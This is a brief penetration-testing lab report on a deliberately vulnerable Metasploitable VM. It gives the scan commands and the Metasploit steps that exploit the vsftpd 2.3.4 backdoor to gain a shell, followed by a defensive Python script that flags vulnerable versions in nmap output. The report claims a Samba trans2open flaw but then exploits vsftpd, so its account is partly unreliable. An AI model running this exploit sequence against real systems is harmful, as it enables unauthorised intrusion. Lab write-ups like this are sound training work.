Metasploitable VM - A detailed penetration testing report covering enumeration, vulnerability analysis, and exploitation.
In this phase, I identified the target and scanned for open services.
I used `ip addr show` to identify my IP, then `netdiscover` to find the target IP on the local NAT network.
- Command: `ip addr show` (192.168.2.4)
- Command: `sudo netdiscover -r 192.168.2.4/24`
- Evidence: View Ip address
- Evidence: View Devices
An aggressive Nmap scan revealed several interesting ports, including 80 (HTTP) and 139/445 (SMB).
- Command: `enum4linux 192.168.2.13`
- Command: `nmap -A -p- 192.168.2.13`
- Evidence: View Enumeration
- Evidence: View Nmap Scan
I identified an outdated version of Samba (2.2.1) which is vulnerable to a "trans2open" overflow.
- Command: `searchsploit vsftpd 2.3.4`
- Command: Load `msfconsole` and search Vsftpd 2.3
- Evidence: View Searchsploit
- Evidence: View msfconsole search
I then set the Responding Host and Listening Host, loaded the payload, then proceeded to run (exploit).
- Command: `use 0` (select backdoor exploit)
- Command: `set RHOSTS 192.168.2.13`
- Command: `exploit`
- Command: `ip addr show`
- Evidence: View Backdoor
- Evidence: View RHOSTS
- Evidence: View Exploit
- Evidence: Gained Shell
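
To re-check hosts for the service versions flagged in this report (vsftpd 2.3.4 and Samba 2.2.1), the following is an added example, not part of the original report: it parses `nmap -sV` normal output and reports open ports whose banner matches the watchlist. The function names and the sample scan text are constructed for illustration.

```python
import re

# Product/version pairs this report flagged; extend with your own findings.
WATCHLIST = {"vsftpd": "2.3.4", "samba": "2.2.1"}

# Matches rows such as "21/tcp open ftp vsftpd 2.3.4"; non-open states are skipped.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Constructed sample of `nmap -sV` normal output (not the report's actual scan).
SAMPLE_SCAN = """\
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open   http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open   netbios-ssn Samba smbd 2.2.1
445/tcp  closed microsoft-ds
8021/tcp open   ftp         vsftpd 12.3.45
"""

def parse_open_services(scan_text):
    """Return one dict per open port row found in the scan text."""
    services = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, name, banner = m.groups()
            services.append({"port": int(port), "proto": proto,
                             "service": name, "banner": banner.strip()})
    return services

def flag_watchlisted(services, watchlist=WATCHLIST):
    """Return (port, product, version) for banners matching the watchlist.

    The banner is split into tokens so that "2.3.4" only matches as a whole
    version string and never as a substring of "12.3.45".
    """
    findings = []
    for svc in services:
        tokens = [t.lower() for t in re.split(r"[\s()/]+", svc["banner"]) if t]
        for product, version in watchlist.items():
            if product in tokens and version in tokens:
                findings.append((svc["port"], product, version))
    return findings

if __name__ == "__main__":
    for port, product, version in flag_watchlisted(parse_open_services(SAMPLE_SCAN)):
        print(f"port {port}: {product} {version} is on the watchlist, upgrade or remove")
```

An empty result after patching only means the banners no longer match; confirm the installed package versions on the host as well.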